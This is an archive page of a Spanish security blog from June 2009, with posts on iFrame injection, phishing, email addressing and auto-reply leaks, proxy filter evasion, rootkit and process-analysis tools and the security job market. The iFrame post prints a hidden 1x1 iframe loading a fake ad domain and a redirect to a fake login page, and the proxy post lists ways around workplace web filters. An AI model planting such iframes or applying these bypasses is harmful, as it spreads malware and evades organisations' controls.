24 de junio de 2009

iFrame Injection

Journalist: Do you think that something like Skynet is possible in the future?

Security Consultant: While just one Security Consultat keep breathing, that won’t happen.

Una cosa que siempre me ha causado cierta admiración es la habilidad e imaginación que las mentes de los “hackers” son capaces de desarrollar a la hora de generar sus ataques. Es una curiosa mezcla entre una gran conocimiento metodológico y sistemático de unos sistemas diseñados por el hombre sobre una base matemática y algebraica que a su vez requiere de gran creatividad e imaginación para obtener nuevas puertas, vulnerabilidades, brechas o como quieras llamarlo sobre sistemas que ya otras muchas personas se estuvieron comiendo la cabeza antes como diseñar. Recuerda un poquito a una partida de ajedrez, los movimientos son conocidos y limitados, pero las posibilidades casi infinitas (como la paradoja del grano de arroz y el tablero de ajedrez).

Esta mañana revisaba un paper con los principales vectores de ataque que el cybercrimen está utilizando en esta primera mitad del 2009, entre los que destacan estos 5:

- SQL Injection

- iFrame Injection

- Encryption Wrappers (malware)

- File Masquerading (algo que ya vimos en el Rosillo Project)

- Encryption techniques in peer to peer systems for bypass web gateways inspection systems.

El documento hace referencia a como los chicos malos utilizan tecnología tan interesante como el Grid Computing para lograr una cantidad ingente de recursos a su disposición (son las conocidas como botnets) y utilizar a su antojo. Independientemente de la opinión que os merezcan estos 5 vectores hay uno del cual llevaba sin escuchar mucho tiempo, es el iFrame Injection.

iFrame Injection

Hagamos un poquito de literatura, un iFrame o “marco incorporado” (que mal suena) es un trozito de codigo HTML que permitirá incrustar un objeto html dentro de una pagina html. Esto puede tener muchas utilidades, entre ellas la publicidad, pero alguien no tardó mucho tiempo en aprovecharse de estos “marcos” con fines delictivos. Todos recordamos esa oleada de correos que en los años 2002-2004 no había siquiera que abrir, ya que incluían código maligno que ejecutaba el gusano anexo del correo que a su vez aprovechaba una vulnerabilidad del Explorer para hacer su trabajo. Toda una interesante vuelta para llegar al objetivo de siempre: comprometer un sistema. Original, ¿verdad?

La idea se ha reciclado un poquito y vuelve a la carga, la definición que se da en el paper es la siguiente:

"iFrame injections can be as small as 1x1 white píxel at the bottom of a web page uncen by the visitor and linked to active scripts that download malware from an obscure Server"

Según Symantec cada dia unas 3000 páginas web son infectadas, algunas de ellas mediante esta técnica que bien podría utilizarse también para hacer phishing, ¿cómo? Supongamos que logro comprometer un servidor web desarrollado en ,,, digamos php (por poner un ejemplo). Supongamos que inyecto en el archivo index.php (los iFrames no son exclusivos del código HTML) el siguiente código maligno:

iframe src=”http://goooogleadsence.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

Como se puede apreciar el atributo de visibilidad está en “oculto”, con lo cual no se mostrará en pantalla, sin embargo se ejecutará. Lo cual cargará una pagina web maligna dentro de “la buena”. Si el sitio ya ha sido catalogado por google como “maligno” es muy probable que nos salte un disclaimer como el siguiente:

Que a su vez nos permitirá ejecutar el “Safebrowsing” de google, quien nos informará del estado de esa Web en los últimos 90 dias, por ejemplo si queremos ver el número de infecciones del Marca nos dirá:

Por lo que podremos ver mañana la victoria de España a EE.UU. con tranquilidad (esperemos). Un consejo, consultad vuestra entidad bancaria, hay alguna sorpresilla.

Esto como suponeis puede ser una pesadilla para un administrador web que tiene que recorrer todas las páginas comprometidas buscando una cadena de texto y eliminándola / reparándola, a veces son cosas tan sencillas como sustituir una referencia por otra:

https://www.victim.foo/index.php?targeturl=http://fake_victim.foo/login.php

Se puede incluso complicar la detección de estas URL para que pase totalmente desapercibida valiéndonos de alguna de las técnicas de “Proxy Jocking” que vimos hace poco, haciéndonos pensar que todo está bien cuando no es así.

Info adicional:

Cleaning iFrame Injections

Frame Injection Fun

Clean.PHP (encuentra patrones conocidos en tu sitio web)

Web Legales en Jaque (Panda - WhitePaper)

Como veis, "nuevas" amenazas para viejos vectores de ataque.

Salu2!

21 de junio de 2009

Phish or No Phish, It's the Question

Con la ola de calor que estamos sufriendo no hay nada como irse al rio un poquito de pesca. Sacar la caña meter los pies en el agua y esperar que pique alguien o algo :-p

En esas estaba cuando me he encontrado este curioso sitio de Verisign con un pequeño test para ver lo bien que eres capaz de diferenciar los sitios reales de los fraudulentos. Una vez más he podido comprobar la retórica de "Todo es seguro", fallé una pregunta :-(

¿Y vosotros, habeis hecho pleno al 15?

Salu2!

PD: Como corolario por si quereis refrescaros más os dejo aquí el enlace al informe de Symantec de phishing 2009 (Abril), España no goza de gran protagonismo en este escenario, USA como siempre en cabeza:

Curiosidad adicional, ¿falta un 30% de mundo o está tan bien distribuido entre los paises en blanco?

18 de junio de 2009

El cartero siempre llama dos veces (o más)


Hay muchas curiosidades en el mundo del correo electrónico, hay vida más allá de los protocolos POP3, SMTP y de Outlook, Lotus Notes y cia. Últimamente parece que están surgiendo con fuerza de nuevo, podíamos leer hace unos días que la primera aparición de la “@” data de 1536, y surgía en un tratado comercial enviado desde Sevilla a Italia. El premio Príncipe de Asturias va a ser entregado al inventor del correo electrónico, Raymond S.Tomlynson, quien creó el primer e-mail de la historia: “QWERTYUIOP” ¿os suena? Posteriormente se definieron las RFC 5322 y 5321 para el protocolo SMTP y el e-mail estándar surgiendo más curiosidades como que no podemos mandar un correo a un usuario cuyo nombre supere los 64 caracteres o a un dominio de más de 255 caracteres.

Parece que algo tan sencillo como el correo electrónico no puede tener mucho más que sacar, pero nos equivocamos. Es posible hacer muchas travesuras con la forma de expresar una dirección de correo, es incluso posible enviar un correo a todoesseguro@192.168.0.1 si es que esa fuera la IP de mi servidor de correo, también se pueden utilizar las comillas para definir el nombre o código de usuario dentro de una organización. Por ejemplo si hubiéramos capturado el código de usuario de un miembro de la organización gigasoft y fuese por ejemplo G1234, podríamos mandar un correo a “G1234”@gigasoft.com con muchas garantías de su correcta entrega (seguro que se os ha puesto cara de Daniel el travieso con esto último) pero no es todo.

Se pueden crear “filtros” de nombre de usuario, hay toda una RFC 5228 dedicada a este tema, donde como curiosidad diré que hace referencia a otra RFC 2119 para interpretar correctamente el significado de MUST, SHALL, MAY, etc. Algo que recuerda a las clases de inglés del instituto :D. Estos filtros se aplican en la parte local, exactamente aquí:

:user "+" :detail "@" :domain

\-----------------/

:local-part

Y lo que es más curioso, muchos webmails permiten utilizarlos, así por ejemplo gmail tiene su “+” mientras que Yahoo se vale del guioncito “-“. Esto es muy útil ya que añadimos una etiqueta a nuestra dirección de correo, supongamos que nos damos de alta en una página de prestigio internacional, llamémosla todoesseguro.com, y que nuestro correo electrónico es giga@gmail.com, podrían tramitar el alta indicando giga+todoesseguro@gmail.com. Así si recibo un correo de todoesseguro.com hacia giga@gmail.com puedo tener la certeza de que estoy recibiendo SPAM y el remitente no es de confianza, por lo que tendré que investigar un poquito :)

Por que de entre las cosas fáciles que hay en el mundo de la Seguridad Informática si lo más sencillo es hacer un escáner de puertos, lo siguiente es hacer e-mail spoofing. Hace unos días mi colega Rosillo, viejo inspirador de entradas como el Rosillo Project fue victima de correos a sí mismo valiéndose de alguna de las técnicas que El Maligno publicaba en su serie “Enviar a un amigo”. Esto que bien puede pasar por una inocente broma puede generar ataques por Ingeniería Social si no nos andamos por cuidado, sobretodo en las fechas que nos encontramos y activando las temibles “autorespuestas”.

¿Temibles?, me explico, dentro de unos días cuando media España se vaya de vacaciones y la otra se quede aquí conmigo en Madrid (no es broma, yo también me iré ;-) ) muchos de nosotros configuraremos algo como esto:

Eso está muy bien, hay que dejar los cabos atados antes de irnos pero, ¿a qué precio?, ¿Quién no está subscrito a una lista de correo?, ¿sabemos lo que ocurrirá cuando nos llegue un correo de un foro?, si, efectivamente todo el mundo sabrá que te has ido y además a quien tiene que recurrir en tu ausencia. Además es probable que “repartas” información como tu usuario, servidor de correo, actividad que realizas, etc. Tal como le ha pasado a toda esta gente.

¿Consejos? Tener mucho cuidado con qué se pone en los mensajes de autorespuesta, no habilitarlo si no es necesario y si trabajamos en una gran compañía como cliente quizás puede ser una medida de seguridad interesante notificar a los responsables de Correo Electrónico que los mensajes de “autorespuesta” no salgan hacia Internet (al menos fuera del Departamento Comercial).

Parece mentira que algo tan sencillo de tanto juego, y eso que no hemos hablado del Correo Electrónico Seguro, supongo que por eso tiene su premio :)

Salu2!

15 de junio de 2009

Doctor Johnston's Security Maxims

Lets start the week with some fun, I have read some of the Doctor Johnston’s (CPP of the Argonee National Library – U.S. Department of Energy) security maxims, I’m pretty sure you will share some of these “feelings”:


- Thanks for Nothin' Maxim: A vulnerability assessment that finds no vulnerabilities or only a few is worthless and wrong.

- Ignorance is Bliss Maxim: The confidence that people have in security is inversely proportional to how much they know about it. Comment: Security looks easy if you've never taken the time to think carefully about it.

- Show Me Maxim: No serious security vulnerability, including blatantly obvious ones, will be dealt with until there is overwhelming evidence and widespread recognition that adversaries have already catastrophically exploited it. In other words, "significant psychological (or literal) damage is required before any significant security changes will be made".

- Insider Risk Maxim: Most organizations will ignore or seriously underestimate the threat from insiders. Comment: Maybe from a combination of denial that we've hired bad people, and a (justifiable) fear of how hard it is to deal with the insider threat?

- We Have Met the Enemy and He is Us Maxim: The insider threat from careless or complacent employees and contractors exceeds the threat from malicious insiders (though the latter is not negligible.) Comment: This is partially, though not totally, due to the fact that careless or complacent insiders often unintentionally help nefarious outsiders.

- Feynman's Maxim: An organization will fear and despise loyal vulnerability assessors and others who point out vulnerabilities or suggest security changes more than malicious adversaries. Comment: An entertaining example of this common phenomenon can be found in "Surely You are Joking, Mr. Feynman!", published by W.W. Norton, 1997. During the Manhattan Project, when physicist Richard Feynman pointed out physical security vulnerabilities, he was banned from the facility, rather than having the vulnerability dealt with (which would have been easy).

Read in NetworkWorld.com, more of this stuff here :)

We will come back soon, happy monday ~~

12 de junio de 2009

E3 2009 && Something Else


Hacemos un Kit Kat, estamos de puente y hay que relajarse un poco. Hace unos días hemos tenido el E3, la super-feria del videojuego donde las grandes compañías muestran sus proyectos y las principales novedades, seguro que habéis visto noticias en Televisión, Prensa y sobretodo Internet.

Actualmente ya se ha dicho casi todo sobre esta feria, Meristation hizo reportajes muy completos y si leéis revistas como Micromania estaréis al tanto, las principales conclusiones son:

- La feria se ha reinventado, superando la apatía de años anteriores.

- Microsoft y su XBOX 360 han sido los ganadores con Project Natal, detrás de Nintento y SONY.

- Ha habido un montón de secuelas (Teken 6, God Of War 3, etc.), pero también proyectos nuevos muy interesantes como Heavy Rain.

Personalmente añadiría una más: SONY se está durmiendo en los laureles y si el dominio de Wii es abrumador, XBOX tampoco se está echando atrás, mientras que PS3 parece estancada en ideas originales, quedándose con los jugadores tradicionales.

Desde luego ver Project Natal ha abierto los ojos de par en par a los jugadores de Wii y a todo el mundo, ¿será tan bueno como parece? Los que lo han probado han dicho que es muy bueno, a excepción de un pequeño lag en los movimientos seguramente solo apreciable por los jugones:

¿Impresionante, verdad? Pues hay una cosa de la que no se ha hablado en el E3, hay algo que puede revolucionar el mercado y a buen seguro lo hará. Se basa en el concepto “Games on Demand”, ¿qué es esto?, ¿cómo funciona?

Actualmente tenemos una gran variedad de servicios contratados que hace unos años bien podía ser una falacia, Telefono, Internet, Televisión, Movil, todo ello ofrecido como servicio y con ofertas especiales, packs, etc. ¿Cómo se reinventa esto? Games On Live apunta como el futuro de los videojuegos:

- No necesitas una consola (al menos como las conocemos ahora), funciona con tu PC, MAC o TV.

- Los juegos corren en granjas de servidores, tu solo recibes la imagen, es parecido a lo que Citrix ya hace por ejemplo con las aplicaciones.

- Compras o pruebas los juegos directamente en Internet, teniendo todo el catálogo al alcance de tu mano, solucionando el problema de la piratería (hasta que alguien invente algo claro).

- El usuario solo necesita los perifericos / complementos, aunque con cosas como Project Natal quizás ni eso:

¿Cuánto tiempo pasará hasta que veamos packs Internet + Movil + Juegos?, ¿Qué impacto tendrá en el mercado del videojuego y como se adaptará la industria a este nuevo paradigma?

Este Invierno se presenta en USA, pronto lo sabremos :)

Salu2!

9 de junio de 2009

Proxy Joking

Mum! Bart is making faces!!

Response: Lisa, it’s your father… I guess

A raiz de la entrada de URL OFUSCATION de Eduardo Abril me picó la curiosidad sobre alternativas para “engañar” o echar una mentira piadosa a esos Proxy que siempre nos están filtrando el tráfico. No me refiero a saltarnos la autenticación, para eso se supone que estamos enchufados en la Intranet de nuestra universidad, empresa, etc. Y si tienes conectividad y no tienes usuario para salir a Internet seguramente ya sabes donde conseguirlo y como.

Hoy hablamos de saltarnos los filtros del Proxy para que naveguemos en esas páginas de construcción de explosivos que tan poco nos gustan, o en megaupload, youtube, facebook y lo que tengáis censurado. Las técnicas que comentaba Eduardo, más orientadas para el engaño a un IDS o a un servidor de aplicaciones, también nos valdrán. Trabajaremos con la misma base, www.milw0rm.com. Repasemos:

1.- Añadir parámetros absurdos à http://www.milw0rm.com/index.php?hola=1&adios=2

2.- Sustituir URL por IP à http://76.74.9.18/index.php?hola=1&adios=2

3.- Traducir a hexadecimal (por ejemplo desde aquí el nombre de archivo solicitado y los parámetros: à http://76.74.9.18/%69%6e%64%65%78%2e%70%68%70?hola=1&adios=2

4.- Utilizar un “anonimizador” (patada a la RAE) à http://anonym.to/?http://76.74.9.18/index.php?hola=1&adios=2

¿Gracioso verdad? Pues todavía hay muchas más posibilidades y casi todas se traducen en pedir lo mismo, pero de otra forma, como cuando te dan una mala noticia con buenas palabras, o cuando ponemos cara de poker. Ahí van mis alternativas:

1.- Utilizar “anonymouse”, es similar al anonym.to pero te enseña por ejemplo cual es la información con que te presentas a Internet. En ocasiones este funciona y el otro no, y al revés: à http://anonymouse.org/cgi-bin/anon-www.cgi/http://www.milw0rm.com

2.- Utilizar Google Translator: ¿cómo?, ¿traducir una pagina web?, SI, con este absurdo se puede engañar a un Proxy à http://translate.google.es/translate?hl=es&sl=en&u=http://www.milw0rm.com

3.- Quizás el anterior no os funcionó, que decepción, un momento, ¿qué tal si probamos con el traductor del nuevo buscador de Microsoft? à http://www.microsofttranslator.com/bv.aspx?ref=SERP&br=ro&mkt=es-S&dl=es&lp=en_es&a=http://milw0rm.com/

4.- Utilizar la caché de google, hay veces que nos tendremos que conformar con páginas obsoletas desde hace 1 hora à http://74.125.77.132/search?q=cache:UB9G4tPVbxoJ:www.milw0rm.com/+milw0rm&cd=1&hl=es&ct=clnk&gl=es

5.- Ah que la página que queremos ver no se actualiza cada mucho tiempo, pues existe otra página para recuperar el historial de casi cualquier sitio que además es ideal para estudio de “Presencia en Internet”, sobretodo al permitirnos ver web obsoletas (con posibles fallos de diseño que pueden haberse trasladado a las actuales), se llama archive.org à http://web.archive.org/web/*/http://www.milw0rm.com

6.- ¿Todavía no lo has conseguido? Hay veces que hay que tirar de lo más obvio, el ataque tradicional por absurdo también “cuela” à Web Dumper

7.- Está bien, vuestro Proxy es de los duros. Habría que dar un premio a su Administrador, ¿o no?, seamos prácticos. Servicios como logmein.com también están por ahí. A las malas podemos montarnos un Proxy local que salga a un Proxy publico, montarnos una VPN, probar con VNC, etc. etc.

La pregunta es, ¿sigue teniendo sentido restringir el tráfico a Internet a los trabajadores?

Salu2!

Anexo: Quizás os venga bien visitar http://zly.me/, sobretodo cuando queremos visitar páginas web con una URL más grande que las zapatillas de Romay… ¡ah! Y si nuestro Proxy no hace filtrado por IP, también valdrá.

7 de junio de 2009

RootKit Hunter

Lo reconozco, me resulta muy cómodo trabajar desde Windows, tanto es así que tengo que obligarme cada cierto tiempo a hacer cositas en Linux para no olvidar "la otra forma" de hacer las cosas, mucho más cercana al Sistema Operativo y que nos recuerda conceptos que con los años van quedando semi-enterrados.

A raíz de unos informes sobre configuración segura de Red Hat con los que tuve que colaborar recientemente me volvió la eterna pregunta, ¿qué hacemos con el malware en Linux?, la creencia popular es que en Linux no hay virus, aunque si hay algo de lo que no podemos vivir los Consultores es de la "vox populi", todavía recuerdo el artículo de Kriptopolis donde hablaban de la creación de un virus en 5 pasos... , asi que decidí indagar herramientas antimalware que puedan ser interesantes.

Con todo este previo me encontré el Rootkit Hunter, repasemos, ¿qué es un rootkit?, tirando de wikipedia os diré que: "Un rootkit es una herramienta, o un grupo de ellas que tiene como finalidad esconderse a sí misma y esconder otros programas, procesos, archivos, directorios, claves de registro, y puertos que permiten al intruso mantener el acceso a un sistema para remotamente comandar acciones o extraer información sensible, a menudo con fines maliciosos o destructivos" en palabras más llanas aún, es un, vamos a entrar en tu caja fuerte y encima nos vamos a asegurar que sigamos entrando cuando querramos sin que te enteres.

Hmmm, de esto si que tenemos en Linux, y mucho, pues bien este programita de sencilla utilización nos ayudará a detectarlos y asegurarnos que el sistema no ha sido comprometido, no tiene una backdoor oculta y no hay ninguna herramienta en la penumbra con intenciones de aparecer cuando no hay nadie mirando, ¿interesante, verdad?

Rootkit Hunter ya corre por su versión 1.3.4 puede descargarse desde aquí aunque si sois más comodos podeis acudir al legendario: apt-get install rkhunter con lo que se descargará e instalará con las opciones por defecto, otra forma es hacerlo así:

Lo normal es que tras la descarga dispongamos de la versión actualizada aunque con un "rkhunter --update" nos aseguramos, después solo basta un "rkhunter --check" para comprobar nuestro sistema (todo ello como root, claro):

En este caso salvando varios warnings parece que me he escapado de los más de 100 rootkits que detecta (entre otras cosas), aunque es normal, arranco desde Ubuntu una vez cada 15 dias, sobretodo ahora que le estoy dando caña a la RC de Windows 7, de la cual espero que hablemos otro día.

Buena semana a todos y, buena caza :)

2 de junio de 2009

Secure Process (Windows)

Red cable give us power, the black one is earth, these two look led’s cables and i don’t know about the yellow one, just remember it from the sham...

Response: Cut up the yellow!

Los procesos, esas extrañas cositas que están siempre corriendo desde el momento que nuestro sistema operativo se carga en memoria. Llenos de instrucciones, en ejecución, en espera, procesos zombie y procesos suspendidos por un examen que nunca hicieron. Ahora en serio, todos recordamos los apuntes de Sistemas Operativos, estamos familiarizados con el Ctrl + Alt + Sup o de algo nos suena el comando “ps” pero, ¿qué narices están haciendo nuestros procesos?, ¿cómo sabemos si están ocultos?, ¿qué librerías están utilizando?, ¿quién los puso ahí?

Probablemente alguna vez os hayais preguntado, ¿por qué la CPU no baja del 80%?, ¿Quién está consumiendo todos los recursos y por qué? Hoy os voy a presentar un par de herramientas que nos sacarán de dudas. La primera es el Security Task Manager que detrás de sus colores fosforito (cuando arranca) te muestra todos los procesos que corren en el sistema, tanto ocultos como visibles, quien es el fabricante, path en el disco duro y un ratio de riesgo que calcula la probabilidad de que sea malware, para mayor seguridad se integra con virustotal y si estamos seguros podemos poner el ratio nosotros mismos (por ejemplo ante herramientas de seguridad que conocemos y hemos instalado):

Una utilidad interesante que incluye es la de poner procesos en cuarentena o directamente desinstalar la aplicación que inició ese proceso:

Pero esto no es todo, todavía existe un proceso misterioso, usa antifaz y se oculta bajo la oscuridad,,, es el,,,, ¡svchost.exe! Todos lo hemos visto pero nadie sabe de donde viene ni a donde va, los virus aprovechan para ocultarse en sus entrañas y algunos incautos deciden cargárselo directamente, normalmente con malas consecuencias. Por suerte disponemos de la utilidad de enrevesado nombre conocida como Svchost Analyzer.

Igual que el Task Manager, nos advertirá sobre lo que considere no debería estar ahí, o al menos es de comportamiento extraño.

Y si con todo esto seguís sin ubicar vuestros procesos, podéis ayudaros con:

http://www.procesoswindows.com/

http://www.what-is-exe.com/

Salu2!

1 de junio de 2009

Market Report: Information Security

Póngame un pentest, una auditoría SOX y,,, ¿a cuánto dice que tiene la de LOPD?

Respuesta: Señora que esto es una fruteria,,, ¿qué tipo de negocio dice que tiene?

Creo que puedo afirmar sin temor a equivocarme que el “staff” de seguridad de la información es probablemente el personal que menos preocupado debe estar por su puesto de trabajo hoy en día. ¡Ojo! Esto no quiero decir que seamos los l-casei inmunitas de la empresa, nadie es indispensable (bueno, quizás Florentino Perez :-p) pero dentro del terremoto que actualmente sufren las economías del planeta y la sangría de paro que especialmente nos afecta podemos mantener una “cierta calma”.

Ahora bien, no parece compatible que el negocio que protegemos / defendemos las esté pasando canutas y que por ejemplo nos suban el sueldo un 20%, algo así comentaban desde Security Art Work hace unos días, hoy nos llega un interesante informe de Barclays Simpson titulado “Market Report: Information Security”, en él se dejan pinceladas bastante interesantes, como la fuerte ralentización de demanda de personal de seguridad en el segundo semestre de 2008, y es que hemos vivido años de relativa abundancia donde directamente las empresas no disponían de personal de seguridad, no sabían lo que era un análisis de riesgos o la dirección de informática, sistemas de información o similares aparecía en los primeros peldaños del organigrama de las empresas. Esto se ha ido transformando por un montón de razones, cumplimiento legal, certificación ISO, lucha contra el fraude o incluso por la visión de un mercado en el que también se podía ganar dinero: La venta de seguridad como servicio.

Si el número de vacantes en seguridad ha disminuido, si se ha incrementado el paro, ¿qué tenemos? Por primera vez desde el 2002 tenemos personal de Seguridad sin trabajo. El informe detalla muy bien por sectores qué estado tenemos, así como cual es el sueldo medio en el Reino Unido y Londres, ¿puede este informe extrapolarse a España? En mi opinión si bien los salarios son sustancialmente más altos allí que aquí, el mercado laboral es muy similar:

El texto viene acompañado de muchas más gráficas e información que apoya estos datos, la sensación que me queda es que la Seguridad ya no vive su época dorada, es un sector tan competitivo como otro (si cabe más) y en líneas generales todos los sectores (tanto públicos como privados) han tomado o comenzado a tomar concienciación sobre la necesidad de Seguridad.

Evidentemente estamos más cerca de las vacas “rellenitas” que de las vacas flacas, ¿no creéis?

Salu2